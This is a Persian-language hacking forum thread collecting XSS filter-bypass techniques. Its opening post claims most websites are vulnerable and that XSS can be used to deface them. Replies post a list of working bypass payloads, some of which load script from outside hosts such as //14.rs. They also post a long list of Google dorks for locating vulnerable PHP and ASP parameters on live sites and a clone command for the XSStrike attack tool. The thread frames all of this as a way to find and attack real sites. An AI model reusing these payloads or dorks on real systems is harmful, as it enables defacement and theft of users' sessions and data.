eblisshar
ارسالها : 331
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 386
تشکر شده : 1653
|
انواع بایپس های باگ XSS
درود . در این تایپک انواع بای پس های باگ خطرناک xss رو میزاریم
این باگ در 80% سایت ها وجود داره و فقط باید بایپس بشه
xss انواع مختلقی داره و بهترین روش اینجکت کد های جاوا اسکریپت با متود get هست که در قسمت سرچ و یا هر قسمتی که با متود get ارسال بشه میشه استفاده کرد
و البته فرقی هم نداره و میشه با متود post تست کرد مثل فروم ها و فیلدهای ثبت نام و غیره . برای پیدا کردن سایت های که این باگ رو دارن دورک های زیادی نوشته شده که داخل همین انجمن میتونید پیدا کنید.
باگ xss قدرت بسیار بالای داره و یکی از خظرناک ترین و رایج ترین باگ ها هست شما میتونید کار های بسیار زیادی با استفاده از این باگ کنید و حتی سایت رو دیفیس کنید
در اینجا سعی میکنیم تمام اسکریپهای بایپس این باگ رو قرار بدیم
به علت قدرت بالای این باگ و اینکه گزاشتن مستقیم کد ها در انجمن باعث اجرای کد میشه اسکریپ ها در فایل تکست گزاشته میشه
امضای کاربر :
قدرت در دست ماست و دست بالای دست بسیار است ..
سیاهی لشکر نیاید به کار / یک مرد جنگی به از صد هزار
tele : ebli3shar
eblisshar.ir
twitter : https://twitter.com/shayanakbari8
channel : @AHRAR_c and old channel : @ashraroffical
|
|
| سه شنبه 24 مهر 1397 - 03:16 |
|
eblisshar
ارسالها : 331
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 386
تشکر شده : 1653
|
|
| سه شنبه 24 مهر 1397 - 03:22 |
|
eblisshar
ارسالها : 331
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 386
تشکر شده : 1653
|
|
| سه شنبه 24 مهر 1397 - 03:22 |
|
eblisshar
ارسالها : 331
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 386
تشکر شده : 1653
|
|
| سه شنبه 24 مهر 1397 - 03:22 |
|
eblisshar
ارسالها : 331
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 386
تشکر شده : 1653
|
|
| سه شنبه 24 مهر 1397 - 03:23 |
|
eblisshar
ارسالها : 331
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 386
تشکر شده : 1653
|
|
| سه شنبه 24 مهر 1397 - 03:25 |
|
eblisshar
ارسالها : 331
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 386
تشکر شده : 1653
|
پاسخ : 7 RE انواع بایپس های باگ XSS
کد:
Full URI uriInHTMLData() uriInHTMLComment() uriInSingleQuotedAttr() uriInDoubleQuotedAttr() uriInUnQuotedAttr()
URI Path uriPathInHTMLData() uriPathInHTMLComment() uriPathInSingleQuotedAttr() uriPathInDoubleQuotedAttr() uriPathInUnQuotedAttr()
URI Query uriQueryInHTMLData() uriQueryInHTMLComment() uriQueryInSingleQuotedAttr() uriQueryInDoubleQuotedAttr() uriQueryInUnQuotedAttr()
URI Component uriComponentInHTMLData() uriComponentInHTMLComment() uriComponentInSingleQuotedAttr() uriComponentInDoubleQuotedAttr() uriComponentInUnQuotedAttr()
URI Fragment uriFragmentInHTMLData() uriFragmentInHTMLComment() uriFragmentInSingleQuotedAttr() uriFragmentInDoubleQuotedAttr() uriFragmentInUnQuotedAttr()
امضای کاربر :
قدرت در دست ماست و دست بالای دست بسیار است ..
سیاهی لشکر نیاید به کار / یک مرد جنگی به از صد هزار
tele : ebli3shar
eblisshar.ir
twitter : https://twitter.com/shayanakbari8
channel : @AHRAR_c and old channel : @ashraroffical
|
|
| سه شنبه 24 مهر 1397 - 05:01 |
|
eblisshar
ارسالها : 331
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 386
تشکر شده : 1653
|
|
| سه شنبه 24 مهر 1397 - 05:04 |
|
blackwolf_iran
ارسالها : 47
عضویت: 19 /7 /1397
تشکرها : 294
تشکر شده : 233
|
پاسخ : 9 RE انواع بایپس های باگ XSS
بسیار عالی و کاربردی
این هم یک لیست خوب از پیلود های این باگ
|
|
| سه شنبه 24 مهر 1397 - 05:10 |
|
blackwolf_iran
ارسالها : 47
عضویت: 19 /7 /1397
تشکرها : 294
تشکر شده : 233
|
پاسخ : 10 RE انواع بایپس های باگ XSS
بایپس های دیگر
کد:
<details open ontoggle=confirm()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confiru006d``]>z
<a href="javascript%26colon;alert(1)">click
<a href=javascript:alert(1)>click
<script/"<a"/src=data:=".<a,[8].some(confirm)>
<svg/x=">"/onload=confirm()//
<--`<img/src=` onerror=confirm``> --!>
<svg%0Aonload=%09((prou006dpt))()//
<sCript x>;(((confirm)))``</scRipt x>
<svg </onload ="1> (_=prompt,_(1)) "">
<!--><script src=//14.rs>
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<iframe/src //onload = prompt(1)
<x oncut=alert()>x
<svg onload=write()>
|
|
| سه شنبه 24 مهر 1397 - 05:11 |
|
darkshadow
ارسالها : 150
عضویت: 8 /6 /1397
محل زندگی: فرانکفورت
تشکرها : 364
تشکر شده : 568
|
پاسخ : 11 RE دورک xss
و این هم دروکهای خوب xss برای پیدا کردن سایت
کد:
inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
inurl:/products/orkutclone/scrapbook.php?id=
inurl:/products/classified/headersearch.php?sid=
inurl:/search_results.php?search=Search&k=
inurl:/preaspjobboard//Employee/emp_login.asp?msg1=
inurl:pages/match_report.php?mid= pages/match_report.php?mid=
inurl:/notice.php?msg= /notice.php?msg=
inurl:/gen_confirm.php?errmsg= /gen_confirm.php?errmsg=
inurl:/index.php?option=com_easygb&Itemid=
inurl:/2wayvideochat/index.php?r=
inurl:/view.php?PID= /view.php?PID=
inurl:/Property-Cpanel.html?pid= /Property-Cpanel.html?pid=
inurl:/showproperty.php?id= /showproperty.php?id=
inurl:/vehicle/buy_do_search/?order_direction=
inurl:/elms/subscribe.php?course_id= /elms/subscribe.php?course_id=
inurl:/winners.php?year=2008&type= /winners.php?
inurl:/schoolmv2/html/studentmain.php?*******=
inurl:/site_search.php?sfunction= /site_search.php?sfunction=
inurl:/search.php?search_keywords= /search.php?search_keywords=
inurl:/hexjector.php?site= /hexjector.php?site=
inurl:/news.php?id= /news.php?id=
inurl:/index.php?view=help&faq=1&ref=
inurl:"contentPage.php?id="
inurl:"displayResource.php?id="
inurl:/index.php?
inurl:/info.asp?
inurl:/preaspjobboard//Employee/emp_login.asp?msg1=
inurl:/pages/match_report.php?mid= pages/match_report.php?mid=
امضای کاربر :
کتگوریهای انجمن
اخرین تاپیکهای انجمن
کتگوری هکینگ
دوست داشتنی ترین چیزها اگر تو را ضعیف کنند، خطرناک ترین چیزهایند.
شاهین نجفی
|
|
| سه شنبه 24 مهر 1397 - 08:11 |
|
virus32
ارسالها : 44
عضویت: 26 /6 /1397
تشکرها : 219
تشکر شده : 218
|
پاسخ : 12 RE انواع بایپس های باگ XSS
سایت کاربردی جهت تست نفوذ باگ xss و دانلود ابزارها و ...
|
|
| یکشنبه 06 آبان 1397 - 05:00 |
|
virus32
ارسالها : 44
عضویت: 26 /6 /1397
تشکرها : 219
تشکر شده : 218
|
پاسخ : 13 RE انواع بایپس های باگ XSS
یک لیست از متود های جدید و حرفه ای برای بایپس باگ xss
دانلود :
|
|
| یکشنبه 06 آبان 1397 - 05:37 |
|
demon
ارسالها : 65
عضویت: 17 /2 /1397
محل زندگی: thran
سن: 25
تشکرها : 279
تشکر شده : 306
|
پاسخ : 14 RE انواع بایپس های باگ XSS
مقاله مفید و یک ابزار برای اموزش XSS (Cross Site Scripting)
|
|
| پنجشنبه 01 آذر 1397 - 20:10 |
|
demon
ارسالها : 65
عضویت: 17 /2 /1397
محل زندگی: thran
سن: 25
تشکرها : 279
تشکر شده : 306
|
پاسخ : 15 RE باگ xss
- سایت xss scanner برای تست انلاین باگ xss
|
|
| دوشنبه 22 مهر 1398 - 02:52 |
|
demon
ارسالها : 65
عضویت: 17 /2 /1397
محل زندگی: thran
سن: 25
تشکرها : 279
تشکر شده : 306
|
پاسخ : 16 RE هک سایت باگ xss
ابزار XSStrike انواع حملات باگ xss
Suggest a feature
Report a bug
Fix something and open a pull request
Create a browser extension
Create a burp suite/zaproxy plugin
Help me document the code
Spread the word
git clone https://github.com/s0md3v/XSStrike.git
|
|
| دوشنبه 22 مهر 1398 - 02:56 |
|
